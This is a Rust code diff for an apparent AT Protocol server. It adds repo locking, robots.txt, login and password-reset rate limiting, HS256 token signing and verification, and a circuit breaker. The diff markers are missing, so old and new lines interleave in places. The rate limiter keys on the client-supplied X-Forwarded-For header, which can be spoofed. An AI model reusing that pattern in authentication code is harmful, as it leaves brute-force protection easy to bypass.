let comparator = if reverse { ">" } else { "<" };
|
||||
let query = format!(
|
||||
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey {} $3 ORDER BY rkey {} LIMIT $4",
|
||||
comparator, order
|
||||
);
|
||||
sqlx::query_as(&query)
|
||||
.bind(user_id)
|
||||
.bind(&input.collection)
|
||||
.bind(cursor)
|
||||
.bind(limit_i64)
|
||||
.fetch_all(&state.db)
|
||||
.await
|
||||
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
|
||||
} else {
|
||||
sqlx::query!(
|
||||
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4",
|
||||
user_id,
|
||||
input.collection,
|
||||
cursor,
|
||||
limit_i64
|
||||
)
|
||||
.fetch_all(&state.db)
|
||||
.await
|
||||
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
|
||||
}
|
||||
} else {
|
||||
if reverse {
|
||||
sqlx::query!(
|
||||
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3",
|
||||
user_id,
|
||||
input.collection,
|
||||
limit_i64
|
||||
)
|
||||
.fetch_all(&state.db)
|
||||
.await
|
||||
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
|
||||
} else {
|
||||
sqlx::query!(
|
||||
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3",
|
||||
user_id,
|
||||
input.collection,
|
||||
limit_i64
|
||||
)
|
||||
.fetch_all(&state.db)
|
||||
.await
|
||||
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
|
||||
let mut conditions = vec!["repo_id = $1", "collection = $2"];
|
||||
let mut param_idx = 3;
|
||||
|
||||
if input.rkey_start.is_some() {
|
||||
conditions.push("rkey > $3");
|
||||
param_idx += 1;
|
||||
}
|
||||
|
||||
if input.rkey_end.is_some() {
|
||||
conditions.push(if param_idx == 3 { "rkey < $3" } else { "rkey < $4" });
|
||||
param_idx += 1;
|
||||
}
|
||||
|
||||
let limit_idx = param_idx;
|
||||
|
||||
let query = format!(
|
||||
"SELECT rkey, record_cid FROM records WHERE {} ORDER BY rkey {} LIMIT ${}",
|
||||
conditions.join(" AND "),
|
||||
order,
|
||||
limit_idx
|
||||
);
|
||||
|
||||
let mut query_builder = sqlx::query_as::<_, (String, String)>(&query)
|
||||
.bind(user_id)
|
||||
.bind(&input.collection);
|
||||
|
||||
if let Some(start) = &input.rkey_start {
|
||||
query_builder = query_builder.bind(start);
|
||||
}
|
||||
if let Some(end) = &input.rkey_end {
|
||||
query_builder = query_builder.bind(end);
|
||||
}
|
||||
|
||||
query_builder.bind(limit_i64).fetch_all(&state.db).await
|
||||
};
|
||||
|
||||
let rows = match rows_res {
|
||||
|
||||
@@ -58,6 +58,34 @@ pub async fn commit_and_log(
|
||||
let mut tx = state.db.begin().await
|
||||
.map_err(|e| format!("Failed to begin transaction: {}", e))?;
|
||||
|
||||
let lock_result = sqlx::query!(
|
||||
"SELECT repo_root_cid FROM repos WHERE user_id = $1 FOR UPDATE NOWAIT",
|
||||
user_id
|
||||
)
|
||||
.fetch_optional(&mut *tx)
|
||||
.await;
|
||||
|
||||
match lock_result {
|
||||
Err(e) => {
|
||||
if let Some(db_err) = e.as_database_error() {
|
||||
if db_err.code().as_deref() == Some("55P03") {
|
||||
return Err("ConcurrentModification: Another request is modifying this repo".to_string());
|
||||
}
|
||||
}
|
||||
return Err(format!("Failed to acquire repo lock: {}", e));
|
||||
}
|
||||
Ok(Some(row)) => {
|
||||
if let Some(expected_root) = ¤t_root_cid {
|
||||
if row.repo_root_cid != expected_root.to_string() {
|
||||
return Err("ConcurrentModification: Repo has been modified since last read".to_string());
|
||||
}
|
||||
}
|
||||
}
|
||||
Ok(None) => {
|
||||
return Err("Repo not found".to_string());
|
||||
}
|
||||
}
|
||||
|
||||
sqlx::query!("UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", new_root_cid.to_string(), user_id)
|
||||
.execute(&mut *tx)
|
||||
.await
|
||||
|
||||
@@ -4,6 +4,14 @@ use serde_json::json;
|
||||
|
||||
use tracing::error;
|
||||
|
||||
pub async fn robots_txt() -> impl IntoResponse {
|
||||
(
|
||||
StatusCode::OK,
|
||||
[("content-type", "text/plain")],
|
||||
"# Hello!\n\n# Crawling the public API is allowed\nUser-agent: *\nAllow: /\n",
|
||||
)
|
||||
}
|
||||
|
||||
pub async fn describe_server() -> impl IntoResponse {
|
||||
let domains_str =
|
||||
std::env::var("AVAILABLE_USER_DOMAINS").unwrap_or_else(|_| "example.com".to_string());
|
||||
|
||||
@@ -15,7 +15,7 @@ pub use account_status::{
|
||||
pub use app_password::{create_app_password, list_app_passwords, revoke_app_password};
|
||||
pub use email::{confirm_email, request_email_update, update_email};
|
||||
pub use invite::{create_invite_code, create_invite_codes, get_account_invite_codes};
|
||||
pub use meta::{describe_server, health};
|
||||
pub use meta::{describe_server, health, robots_txt};
|
||||
pub use password::{request_password_reset, reset_password};
|
||||
pub use service_auth::get_service_auth;
|
||||
pub use session::{create_session, delete_session, get_session, refresh_session};
|
||||
|
||||
@@ -2,7 +2,7 @@ use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::State,
|
||||
http::StatusCode,
|
||||
http::{HeaderMap, StatusCode},
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use bcrypt::{hash, DEFAULT_COST};
|
||||
@@ -15,6 +15,22 @@ fn generate_reset_code() -> String {
|
||||
crate::util::generate_token_code()
|
||||
}
|
||||
|
||||
fn extract_client_ip(headers: &HeaderMap) -> String {
|
||||
if let Some(forwarded) = headers.get("x-forwarded-for") {
|
||||
if let Ok(value) = forwarded.to_str() {
|
||||
if let Some(first_ip) = value.split(',').next() {
|
||||
return first_ip.trim().to_string();
|
||||
}
|
||||
}
|
||||
}
|
||||
if let Some(real_ip) = headers.get("x-real-ip") {
|
||||
if let Ok(value) = real_ip.to_str() {
|
||||
return value.trim().to_string();
|
||||
}
|
||||
}
|
||||
"unknown".to_string()
|
||||
}
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct RequestPasswordResetInput {
|
||||
pub email: String,
|
||||
@@ -22,8 +38,22 @@ pub struct RequestPasswordResetInput {
|
||||
|
||||
pub async fn request_password_reset(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
Json(input): Json<RequestPasswordResetInput>,
|
||||
) -> Response {
|
||||
let client_ip = extract_client_ip(&headers);
|
||||
if state.rate_limiters.password_reset.check_key(&client_ip).is_err() {
|
||||
warn!(ip = %client_ip, "Password reset rate limit exceeded");
|
||||
return (
|
||||
StatusCode::TOO_MANY_REQUESTS,
|
||||
Json(json!({
|
||||
"error": "RateLimitExceeded",
|
||||
"message": "Too many password reset requests. Please try again later."
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
|
||||
let email = input.email.trim().to_lowercase();
|
||||
if email.is_empty() {
|
||||
return (
|
||||
|
||||
@@ -4,6 +4,7 @@ use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::State,
|
||||
http::{HeaderMap, StatusCode},
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use bcrypt::verify;
|
||||
@@ -11,6 +12,22 @@ use serde::{Deserialize, Serialize};
|
||||
use serde_json::json;
|
||||
use tracing::{error, info, warn};
|
||||
|
||||
fn extract_client_ip(headers: &HeaderMap) -> String {
|
||||
if let Some(forwarded) = headers.get("x-forwarded-for") {
|
||||
if let Ok(value) = forwarded.to_str() {
|
||||
if let Some(first_ip) = value.split(',').next() {
|
||||
return first_ip.trim().to_string();
|
||||
}
|
||||
}
|
||||
}
|
||||
if let Some(real_ip) = headers.get("x-real-ip") {
|
||||
if let Ok(value) = real_ip.to_str() {
|
||||
return value.trim().to_string();
|
||||
}
|
||||
}
|
||||
"unknown".to_string()
|
||||
}
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct CreateSessionInput {
|
||||
pub identifier: String,
|
||||
@@ -28,10 +45,24 @@ pub struct CreateSessionOutput {
|
||||
|
||||
pub async fn create_session(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
Json(input): Json<CreateSessionInput>,
|
||||
) -> Response {
|
||||
info!("create_session called");
|
||||
|
||||
let client_ip = extract_client_ip(&headers);
|
||||
if state.rate_limiters.login.check_key(&client_ip).is_err() {
|
||||
warn!(ip = %client_ip, "Login rate limit exceeded");
|
||||
return (
|
||||
StatusCode::TOO_MANY_REQUESTS,
|
||||
Json(json!({
|
||||
"error": "RateLimitExceeded",
|
||||
"message": "Too many login attempts. Please try again later."
|
||||
})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
|
||||
let row = match sqlx::query!(
|
||||
"SELECT u.id, u.did, u.handle, u.password_hash, k.key_bytes, k.encryption_version FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.handle = $1 OR u.email = $1",
|
||||
input.identifier
|
||||
|
||||
48
src/api/temp.rs
Normal file
48
src/api/temp.rs
Normal file
@@ -0,0 +1,48 @@
|
||||
use axum::{
|
||||
Json,
|
||||
extract::State,
|
||||
http::{HeaderMap, StatusCode},
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use serde::Serialize;
|
||||
use serde_json::json;
|
||||
|
||||
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
|
||||
use crate::state::AppState;
|
||||
|
||||
#[derive(Serialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct CheckSignupQueueOutput {
|
||||
pub activated: bool,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub place_in_queue: Option<i64>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub estimated_time_ms: Option<i64>,
|
||||
}
|
||||
|
||||
pub async fn check_signup_queue(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
) -> Response {
|
||||
if let Some(token) = extract_bearer_token_from_header(
|
||||
headers.get("Authorization").and_then(|h| h.to_str().ok())
|
||||
) {
|
||||
if let Ok(user) = validate_bearer_token(&state.db, &token).await {
|
||||
if user.is_oauth {
|
||||
return (
|
||||
StatusCode::FORBIDDEN,
|
||||
Json(json!({
|
||||
"error": "Forbidden",
|
||||
"message": "OAuth credentials are not supported for this endpoint"
|
||||
})),
|
||||
).into_response();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Json(CheckSignupQueueOutput {
|
||||
activated: true,
|
||||
place_in_queue: None,
|
||||
estimated_time_ms: None,
|
||||
}).into_response()
|
||||
}
|
||||
@@ -3,9 +3,13 @@ use anyhow::Result;
|
||||
use base64::Engine as _;
|
||||
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
|
||||
use chrono::{DateTime, Duration, Utc};
|
||||
use hmac::{Hmac, Mac};
|
||||
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
|
||||
use sha2::Sha256;
|
||||
use uuid;
|
||||
|
||||
type HmacSha256 = Hmac<Sha256>;
|
||||
|
||||
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
|
||||
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
|
||||
pub const TOKEN_TYPE_SERVICE: &str = "jwt";
|
||||
@@ -118,3 +122,97 @@ fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<
|
||||
|
||||
Ok(format!("{}.{}", message, signature_b64))
|
||||
}
|
||||
|
||||
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
|
||||
Ok(create_access_token_hs256_with_metadata(did, secret)?.token)
|
||||
}
|
||||
|
||||
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
|
||||
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
|
||||
}
|
||||
|
||||
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
|
||||
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
|
||||
}
|
||||
|
||||
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
|
||||
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
|
||||
}
|
||||
|
||||
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
|
||||
let expiration = Utc::now()
|
||||
.checked_add_signed(Duration::seconds(60))
|
||||
.expect("valid timestamp")
|
||||
.timestamp();
|
||||
|
||||
let claims = Claims {
|
||||
iss: did.to_owned(),
|
||||
sub: did.to_owned(),
|
||||
aud: aud.to_owned(),
|
||||
exp: expiration as usize,
|
||||
iat: Utc::now().timestamp() as usize,
|
||||
scope: None,
|
||||
lxm: Some(lxm.to_string()),
|
||||
jti: uuid::Uuid::new_v4().to_string(),
|
||||
};
|
||||
|
||||
sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
|
||||
}
|
||||
|
||||
fn create_hs256_token_with_metadata(
|
||||
did: &str,
|
||||
scope: &str,
|
||||
typ: &str,
|
||||
secret: &[u8],
|
||||
duration: Duration,
|
||||
) -> Result<TokenWithMetadata> {
|
||||
let expires_at = Utc::now()
|
||||
.checked_add_signed(duration)
|
||||
.expect("valid timestamp");
|
||||
let expiration = expires_at.timestamp();
|
||||
let jti = uuid::Uuid::new_v4().to_string();
|
||||
|
||||
let claims = Claims {
|
||||
iss: did.to_owned(),
|
||||
sub: did.to_owned(),
|
||||
aud: format!(
|
||||
"did:web:{}",
|
||||
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
|
||||
),
|
||||
exp: expiration as usize,
|
||||
iat: Utc::now().timestamp() as usize,
|
||||
scope: Some(scope.to_string()),
|
||||
lxm: None,
|
||||
jti: jti.clone(),
|
||||
};
|
||||
|
||||
let token = sign_claims_hs256(claims, typ, secret)?;
|
||||
Ok(TokenWithMetadata {
|
||||
token,
|
||||
jti,
|
||||
expires_at,
|
||||
})
|
||||
}
|
||||
|
||||
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
|
||||
let header = Header {
|
||||
alg: "HS256".to_string(),
|
||||
typ: typ.to_string(),
|
||||
};
|
||||
|
||||
let header_json = serde_json::to_string(&header)?;
|
||||
let claims_json = serde_json::to_string(&claims)?;
|
||||
|
||||
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
|
||||
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
|
||||
|
||||
let message = format!("{}.{}", header_b64, claims_b64);
|
||||
|
||||
let mut mac = HmacSha256::new_from_slice(secret)
|
||||
.map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
|
||||
mac.update(message.as_bytes());
|
||||
let signature = mac.finalize().into_bytes();
|
||||
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
|
||||
|
||||
Ok(format!("{}.{}", message, signature_b64))
|
||||
}
|
||||
|
||||
@@ -4,7 +4,12 @@ use anyhow::{Context, Result, anyhow};
|
||||
use base64::Engine as _;
|
||||
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
|
||||
use chrono::Utc;
|
||||
use hmac::{Hmac, Mac};
|
||||
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
|
||||
use sha2::Sha256;
|
||||
use subtle::ConstantTimeEq;
|
||||
|
||||
type HmacSha256 = Hmac<Sha256>;
|
||||
|
||||
pub fn get_did_from_token(token: &str) -> Result<String, String> {
|
||||
let parts: Vec<&str> = token.split('.').collect();
|
||||
@@ -63,6 +68,24 @@ pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<C
|
||||
)
|
||||
}
|
||||
|
||||
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
|
||||
verify_token_hs256_internal(
|
||||
token,
|
||||
secret,
|
||||
Some(TOKEN_TYPE_ACCESS),
|
||||
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
|
||||
)
|
||||
}
|
||||
|
||||
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
|
||||
verify_token_hs256_internal(
|
||||
token,
|
||||
secret,
|
||||
Some(TOKEN_TYPE_REFRESH),
|
||||
Some(&[SCOPE_REFRESH]),
|
||||
)
|
||||
}
|
||||
|
||||
fn verify_token_internal(
|
||||
token: &str,
|
||||
key_bytes: &[u8],
|
||||
@@ -124,3 +147,86 @@ fn verify_token_internal(
|
||||
|
||||
Ok(TokenData { claims })
|
||||
}
|
||||
|
||||
fn verify_token_hs256_internal(
|
||||
token: &str,
|
||||
secret: &[u8],
|
||||
expected_typ: Option<&str>,
|
||||
allowed_scopes: Option<&[&str]>,
|
||||
) -> Result<TokenData<Claims>> {
|
||||
let parts: Vec<&str> = token.split('.').collect();
|
||||
if parts.len() != 3 {
|
||||
return Err(anyhow!("Invalid token format"));
|
||||
}
|
||||
|
||||
let header_b64 = parts[0];
|
||||
let claims_b64 = parts[1];
|
||||
let signature_b64 = parts[2];
|
||||
|
||||
let header_bytes = URL_SAFE_NO_PAD
|
||||
.decode(header_b64)
|
||||
.context("Base64 decode of header failed")?;
|
||||
let header: Header =
|
||||
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
|
||||
|
||||
if header.alg != "HS256" {
|
||||
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
|
||||
}
|
||||
|
||||
if let Some(expected) = expected_typ {
|
||||
if header.typ != expected {
|
||||
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
|
||||
}
|
||||
}
|
||||
|
||||
let signature_bytes = URL_SAFE_NO_PAD
|
||||
.decode(signature_b64)
|
||||
.context("Base64 decode of signature failed")?;
|
||||
|
||||
let message = format!("{}.{}", header_b64, claims_b64);
|
||||
let mut mac = HmacSha256::new_from_slice(secret)
|
||||
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
|
||||
mac.update(message.as_bytes());
|
||||
let expected_signature = mac.finalize().into_bytes();
|
||||
|
||||
let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
|
||||
if !is_valid {
|
||||
return Err(anyhow!("Signature verification failed"));
|
||||
}
|
||||
|
||||
let claims_bytes = URL_SAFE_NO_PAD
|
||||
.decode(claims_b64)
|
||||
.context("Base64 decode of claims failed")?;
|
||||
let claims: Claims =
|
||||
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
|
||||
|
||||
let now = Utc::now().timestamp() as usize;
|
||||
if claims.exp < now {
|
||||
return Err(anyhow!("Token expired"));
|
||||
}
|
||||
|
||||
if let Some(scopes) = allowed_scopes {
|
||||
let token_scope = claims.scope.as_deref().unwrap_or("");
|
||||
if !scopes.contains(&token_scope) {
|
||||
return Err(anyhow!("Invalid token scope: {}", token_scope));
|
||||
}
|
||||
}
|
||||
|
||||
Ok(TokenData { claims })
|
||||
}
|
||||
|
||||
pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
|
||||
let parts: Vec<&str> = token.split('.').collect();
|
||||
if parts.len() != 3 {
|
||||
return Err("Invalid token format".to_string());
|
||||
}
|
||||
|
||||
let header_bytes = URL_SAFE_NO_PAD
|
||||
.decode(parts[0])
|
||||
.map_err(|e| format!("Base64 decode failed: {}", e))?;
|
||||
|
||||
let header: Header =
|
||||
serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
|
||||
|
||||
Ok(header.alg)
|
||||
}
|
||||
|
||||
307
src/circuit_breaker.rs
Normal file
307
src/circuit_breaker.rs
Normal file
@@ -0,0 +1,307 @@
|
||||
use std::sync::atomic::{AtomicU32, AtomicU64, Ordering};
|
||||
use std::sync::Arc;
|
||||
use std::time::Duration;
|
||||
use tokio::sync::RwLock;
|
||||
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
|
||||
pub enum CircuitState {
|
||||
Closed,
|
||||
Open,
|
||||
HalfOpen,
|
||||
}
|
||||
|
||||
pub struct CircuitBreaker {
|
||||
name: String,
|
||||
failure_threshold: u32,
|
||||
success_threshold: u32,
|
||||
timeout: Duration,
|
||||
state: Arc<RwLock<CircuitState>>,
|
||||
failure_count: AtomicU32,
|
||||
success_count: AtomicU32,
|
||||
last_failure_time: AtomicU64,
|
||||
}
|
||||
|
||||
impl CircuitBreaker {
|
||||
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
|
||||
Self {
|
||||
name: name.to_string(),
|
||||
failure_threshold,
|
||||
success_threshold,
|
||||
timeout: Duration::from_secs(timeout_secs),
|
||||
state: Arc::new(RwLock::new(CircuitState::Closed)),
|
||||
failure_count: AtomicU32::new(0),
|
||||
success_count: AtomicU32::new(0),
|
||||
last_failure_time: AtomicU64::new(0),
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn can_execute(&self) -> bool {
|
||||
let state = self.state.read().await;
|
||||
match *state {
|
||||
CircuitState::Closed => true,
|
||||
CircuitState::Open => {
|
||||
let last_failure = self.last_failure_time.load(Ordering::SeqCst);
|
||||
let now = std::time::SystemTime::now()
|
||||
.duration_since(std::time::UNIX_EPOCH)
|
||||
.unwrap()
|
||||
.as_secs();
|
||||
|
||||
if now - last_failure >= self.timeout.as_secs() {
|
||||
drop(state);
|
||||
let mut state = self.state.write().await;
|
||||
if *state == CircuitState::Open {
|
||||
*state = CircuitState::HalfOpen;
|
||||
self.success_count.store(0, Ordering::SeqCst);
|
||||
tracing::info!(circuit = %self.name, "Circuit breaker transitioning to half-open");
|
||||
return true;
|
||||
}
|
||||
}
|
||||
false
|
||||
}
|
||||
CircuitState::HalfOpen => true,
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn record_success(&self) {
|
||||
let state = *self.state.read().await;
|
||||
|
||||
match state {
|
||||
CircuitState::Closed => {
|
||||
self.failure_count.store(0, Ordering::SeqCst);
|
||||
}
|
||||
CircuitState::HalfOpen => {
|
||||
let count = self.success_count.fetch_add(1, Ordering::SeqCst) + 1;
|
||||
if count >= self.success_threshold {
|
||||
let mut state = self.state.write().await;
|
||||
*state = CircuitState::Closed;
|
||||
self.failure_count.store(0, Ordering::SeqCst);
|
||||
self.success_count.store(0, Ordering::SeqCst);
|
||||
tracing::info!(circuit = %self.name, "Circuit breaker closed after successful recovery");
|
||||
}
|
||||
}
|
||||
CircuitState::Open => {}
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn record_failure(&self) {
|
||||
let state = *self.state.read().await;
|
||||
|
||||
match state {
|
||||
CircuitState::Closed => {
|
||||
let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
|
||||
if count >= self.failure_threshold {
|
||||
let mut state = self.state.write().await;
|
||||
*state = CircuitState::Open;
|
||||
let now = std::time::SystemTime::now()
|
||||
.duration_since(std::time::UNIX_EPOCH)
|
||||
.unwrap()
|
||||
.as_secs();
|
||||
self.last_failure_time.store(now, Ordering::SeqCst);
|
||||
tracing::warn!(
|
||||
circuit = %self.name,
|
||||
failures = count,
|
||||
"Circuit breaker opened after {} failures",
|
||||
count
|
||||
);
|
||||
}
|
||||
}
|
||||
CircuitState::HalfOpen => {
|
||||
let mut state = self.state.write().await;
|
||||
*state = CircuitState::Open;
|
||||
let now = std::time::SystemTime::now()
|
||||
.duration_since(std::time::UNIX_EPOCH)
|
||||
.unwrap()
|
||||
.as_secs();
|
||||
self.last_failure_time.store(now, Ordering::SeqCst);
|
||||
self.success_count.store(0, Ordering::SeqCst);
|
||||
tracing::warn!(circuit = %self.name, "Circuit breaker reopened after failure in half-open state");
|
||||
}
|
||||
CircuitState::Open => {}
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn state(&self) -> CircuitState {
|
||||
*self.state.read().await
|
||||
}
|
||||
|
||||
pub fn name(&self) -> &str {
|
||||
&self.name
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Clone)]
|
||||
pub struct CircuitBreakers {
|
||||
pub plc_directory: Arc<CircuitBreaker>,
|
||||
pub relay_notification: Arc<CircuitBreaker>,
|
||||
}
|
||||
|
||||
impl Default for CircuitBreakers {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl CircuitBreakers {
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
plc_directory: Arc::new(CircuitBreaker::new("plc_directory", 5, 3, 60)),
|
||||
relay_notification: Arc::new(CircuitBreaker::new("relay_notification", 10, 5, 30)),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug)]
|
||||
pub struct CircuitOpenError {
|
||||
pub circuit_name: String,
|
||||
}
|
||||
|
||||
impl std::fmt::Display for CircuitOpenError {
|
||||
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
|
||||
write!(f, "Circuit breaker '{}' is open", self.circuit_name)
|
||||
}
|
||||
}
|
||||
|
||||
impl std::error::Error for CircuitOpenError {}
|
||||
|
||||
pub async fn with_circuit_breaker<T, E, F, Fut>(
|
||||
circuit: &CircuitBreaker,
|
||||
operation: F,
|
||||
) -> Result<T, CircuitBreakerError<E>>
|
||||
where
|
||||
F: FnOnce() -> Fut,
|
||||
Fut: std::future::Future<Output = Result<T, E>>,
|
||||
{
|
||||
if !circuit.can_execute().await {
|
||||
return Err(CircuitBreakerError::CircuitOpen(CircuitOpenError {
|
||||
circuit_name: circuit.name().to_string(),
|
||||
}));
|
||||
}
|
||||
|
||||
match operation().await {
|
||||
Ok(result) => {
|
||||
circuit.record_success().await;
|
||||
Ok(result)
|
||||
}
|
||||
Err(e) => {
|
||||
circuit.record_failure().await;
|
||||
Err(CircuitBreakerError::OperationFailed(e))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug)]
|
||||
pub enum CircuitBreakerError<E> {
|
||||
CircuitOpen(CircuitOpenError),
|
||||
OperationFailed(E),
|
||||
}
|
||||
|
||||
impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
|
||||
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
|
||||
match self {
|
||||
CircuitBreakerError::CircuitOpen(e) => write!(f, "{}", e),
|
||||
CircuitBreakerError::OperationFailed(e) => write!(f, "Operation failed: {}", e),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
|
||||
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
|
||||
match self {
|
||||
CircuitBreakerError::CircuitOpen(e) => Some(e),
|
||||
CircuitBreakerError::OperationFailed(e) => Some(e),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_circuit_breaker_starts_closed() {
|
||||
let cb = CircuitBreaker::new("test", 3, 2, 10);
|
||||
assert_eq!(cb.state().await, CircuitState::Closed);
|
||||
assert!(cb.can_execute().await);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_circuit_breaker_opens_after_failures() {
|
||||
let cb = CircuitBreaker::new("test", 3, 2, 10);
|
||||
|
||||
cb.record_failure().await;
|
||||
assert_eq!(cb.state().await, CircuitState::Closed);
|
||||
|
||||
cb.record_failure().await;
|
||||
assert_eq!(cb.state().await, CircuitState::Closed);
|
||||
|
||||
cb.record_failure().await;
|
||||
assert_eq!(cb.state().await, CircuitState::Open);
|
||||
assert!(!cb.can_execute().await);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_circuit_breaker_success_resets_failures() {
|
||||
let cb = CircuitBreaker::new("test", 3, 2, 10);
|
||||
|
||||
cb.record_failure().await;
|
||||
cb.record_failure().await;
|
||||
cb.record_success().await;
|
||||
|
||||
cb.record_failure().await;
|
||||
cb.record_failure().await;
|
||||
assert_eq!(cb.state().await, CircuitState::Closed);
|
||||
|
||||
cb.record_failure().await;
|
||||
assert_eq!(cb.state().await, CircuitState::Open);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_circuit_breaker_half_open_closes_after_successes() {
|
||||
let cb = CircuitBreaker::new("test", 3, 2, 0);
|
||||
|
||||
for _ in 0..3 {
|
||||
cb.record_failure().await;
|
||||
}
|
||||
assert_eq!(cb.state().await, CircuitState::Open);
|
||||
|
||||
tokio::time::sleep(Duration::from_millis(100)).await;
|
||||
|
||||
assert!(cb.can_execute().await);
|
||||
assert_eq!(cb.state().await, CircuitState::HalfOpen);
|
||||
|
||||
cb.record_success().await;
|
||||
assert_eq!(cb.state().await, CircuitState::HalfOpen);
|
||||
|
||||
cb.record_success().await;
|
||||
assert_eq!(cb.state().await, CircuitState::Closed);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_circuit_breaker_half_open_reopens_on_failure() {
|
||||
let cb = CircuitBreaker::new("test", 3, 2, 0);
|
||||
|
||||
for _ in 0..3 {
|
||||
cb.record_failure().await;
|
||||
}
|
||||
|
||||
tokio::time::sleep(Duration::from_millis(100)).await;
|
||||
cb.can_execute().await;
|
||||
|
||||
cb.record_failure().await;
|
||||
assert_eq!(cb.state().await, CircuitState::Open);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_with_circuit_breaker_helper() {
|
||||
let cb = CircuitBreaker::new("test", 3, 2, 10);
|
||||
|
||||
